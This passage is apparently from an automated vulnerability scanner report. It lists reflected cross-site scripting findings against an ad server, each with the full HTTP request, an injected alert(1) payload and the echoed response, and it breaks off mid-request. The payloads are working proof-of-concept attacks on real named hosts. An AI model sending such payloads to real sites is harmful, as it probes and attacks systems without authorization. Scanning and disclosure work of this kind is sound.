Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 277

document.write('<a href="117f6'-alert(1)-'11281d989chttp://adserver.adtechus.com/?adlink|5235|1288708|0|16|AdId=-8;BnId=-1;itime=0;" target=_blank><img src="http://aka-cdn-ns.adtechus.com/images/Defau
...[SNIP]...

2.75. http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd34e'-alert(1)-'24f72934008 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH;AdId=913421;BnId=-1;;loc=100;target=_blank;misc=[TIMESTAMP];rdclick=&bd34e'-alert(1)-'24f72934008=1 HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 281

document.write('<a href="&bd34e'-alert(1)-'24f72934008=1http://adserver.adtechus.com/?adlink|5235|1288708|0|16|AdId=-8;BnId=-1;itime=0;" target=_blank><img src="http://aka-cdn-ns.adtechus.com/images/D
...[SNIP]...

2.76. http://adserver.adtechus.com/addyn/3.0/5214.1/1044213/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1044213/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce688"-alert(1)-"cec543173c6 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1044213/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_300x250_2;size=300x250;key=;grp=353;misc=1290373580669;aduho=-360;rdclick=ce688"-alert(1)-"cec543173c6 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1973

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1044213/0/170/AdId=1114797;BnId=1;itime=384544517;nodecode=yes;link=ce688"-alert(1)-"cec543173c6http://www.seetorontonow.com/camp/couples/index.html?ucid=M2010-001705\" target=\"_blank\">
...[SNIP]...

2.77. http://adserver.adtechus.com/addyn/3.0/5214.1/1044213/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1044213/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b16b"-alert(1)-"ee8cf03855d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1044213/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_300x250_2;size=300x250;key=;grp=353;misc=1290373580669;aduho=-360;rdclick=&4b16b"-alert(1)-"ee8cf03855d=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2247

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1044213/0/170/AdId=1114797;BnId=1;itime=384546624;nodecode=yes;link=&4b16b"-alert(1)-"ee8cf03855d=1http://www.seetorontonow.com/camp/couples/index.html?ucid=M2010-001705\" target=\"_blank\">
...[SNIP]...

2.78. http://adserver.adtechus.com/addyn/3.0/5214.1/1076814/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1076814/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71102"-alert(1)-"cd09ef82e73 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1076814/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_1;size=135x68;key=;grp=353;misc=1290373581486;aduho=-360;rdclick=71102"-alert(1)-"cd09ef82e73 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2418

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1076814/0/2687/AdId=1146641;BnId=1;itime=384553960;nodecode=yes;link=71102"-alert(1)-"cd09ef82e73http://www.foodandwineexpo.ca/sitepages/?cid=356&cn=BUY%20ADMISSION%20TICKETS&an=ADMISSION%20TICKETS\" title=\"\" target=\"_blank\">
...[SNIP]...

2.79. http://adserver.adtechus.com/addyn/3.0/5214.1/1076814/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1076814/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17501"-alert(1)-"5e358f87f7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1076814/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_1;size=135x68;key=;grp=353;misc=1290373581486;aduho=-360;rdclick=&17501"-alert(1)-"5e358f87f7b=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2424

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1076814/0/2687/AdId=1146641;BnId=1;itime=384555255;nodecode=yes;link=&17501"-alert(1)-"5e358f87f7b=1http://www.foodandwineexpo.ca/sitepages/?cid=356&cn=BUY%20ADMISSION%20TICKETS&an=ADMISSION%20TICKETS\" title=\"\" target=\"_blank\">
...[SNIP]...

2.80. http://adserver.adtechus.com/addyn/3.0/5214.1/1076815/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1076815/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28f4d"-alert(1)-"6cad9f6bb68 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1076815/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_2;size=135x68;key=;grp=353;misc=1290373581632;aduho=-360;rdclick=28f4d"-alert(1)-"6cad9f6bb68 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2289

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1076815/0/2687/AdId=1284103;BnId=1;itime=384557603;nodecode=yes;link=28f4d"-alert(1)-"6cad9f6bb68www.torontochristmasmarket.com\" title=\"\" target=\"_blank\">
...[SNIP]...

2.81. http://adserver.adtechus.com/addyn/3.0/5214.1/1076815/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1076815/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8f26"-alert(1)-"b5d5d4e6f0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1076815/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_2;size=135x68;key=;grp=353;misc=1290373581632;aduho=-360;rdclick=&e8f26"-alert(1)-"b5d5d4e6f0f=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2295

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1076815/0/2687/AdId=1284103;BnId=1;itime=384558622;nodecode=yes;link=&e8f26"-alert(1)-"b5d5d4e6f0f=1www.torontochristmasmarket.com\" title=\"\" target=\"_blank\">
...[SNIP]...

2.82. http://adserver.adtechus.com/addyn/3.0/5214.1/1076816/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1076816/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f4cc"-alert(1)-"e7c994764d3 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1076816/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_3;size=135x68;key=;grp=353;misc=1290373581762;aduho=-360;rdclick=3f4cc"-alert(1)-"e7c994764d3 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2304

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1076816/0/2687/AdId=1273359;BnId=1;itime=384563729;nodecode=yes;link=3f4cc"-alert(1)-"e7c994764d3http://www.rom.on.ca/terracottaarmy/en/\" title=\"\" target=\"_blank\">
...[SNIP]...

2.83. http://adserver.adtechus.com/addyn/3.0/5214.1/1076816/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1076816/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 242ba"-alert(1)-"ea8878819ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1076816/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_3;size=135x68;key=;grp=353;misc=1290373581762;aduho=-360;rdclick=&242ba"-alert(1)-"ea8878819ac=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2310

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1076816/0/2687/AdId=1273359;BnId=1;itime=384567113;nodecode=yes;link=&242ba"-alert(1)-"ea8878819ac=1http://www.rom.on.ca/terracottaarmy/en/\" title=\"\" target=\"_blank\">
...[SNIP]...

2.84. http://adserver.adtechus.com/addyn/3.0/5214.1/1240429/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1240429/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebeb1"-alert(1)-"39d5bc50805 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1240429/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_4;size=135x68;key=;grp=353;misc=1290373581938;aduho=-360;rdclick=ebeb1"-alert(1)-"39d5bc50805 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2365

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1240429/0/2687/AdId=1115502;BnId=1;itime=384557883;nodecode=yes;link=ebeb1"-alert(1)-"39d5bc50805http://www.seetorontonow.com/camp/couples/index.html?ucid=M2010-001765\" title=\"\" target=\"_blank\">
...[SNIP]...

2.85. http://adserver.adtechus.com/addyn/3.0/5214.1/1240429/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1240429/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95834"-alert(1)-"99ca9b2fcd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1240429/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_135x68_4;size=135x68;key=;grp=353;misc=1290373581938;aduho=-360;rdclick=&95834"-alert(1)-"99ca9b2fcd2=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2371

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/1240429/0/2687/AdId=1115502;BnId=1;itime=384561721;nodecode=yes;link=&95834"-alert(1)-"99ca9b2fcd2=1http://www.seetorontonow.com/camp/couples/index.html?ucid=M2010-001765\" title=\"\" target=\"_blank\">
...[SNIP]...

2.86. http://adserver.adtechus.com/addyn/3.0/5214.1/1245415/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245415/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28914'-alert(1)-'c43e7f73c9e was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1245415/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_4;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886803;aduho=-360;rdclick=28914'-alert(1)-'c43e7f73c9e HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 380

document.write('<a href="28914'-alert(1)-'c43e7f73c9ehttp://adserver.adtechus.com/?adlink/5214/1245415/0/2687/AdId=-3;BnId=0;itime=210256725;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" target=_blank>
...[SNIP]...

2.87. http://adserver.adtechus.com/addyn/3.0/5214.1/1245415/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245415/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b920b'-alert(1)-'a7a037055f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1245415/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_4;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886803;aduho=-360;rdclick=&b920b'-alert(1)-'a7a037055f1=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 383

document.write('<a href="&b920b'-alert(1)-'a7a037055f1=1http://adserver.adtechus.com/?adlink/5214/1245415/0/2687/AdId=-3;BnId=0;itime=210257205;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;" target=_blank
...[SNIP]...

2.88. http://adserver.adtechus.com/addyn/3.0/5214.1/1245417/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/1245417/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc1aa"-alert(1)-"896ed7c58c4 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/1245417/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_135x68_1;size=135x68;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886472;aduho=-360;rdclick=bc1aa"-alert(1)-"896ed7c58c4 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
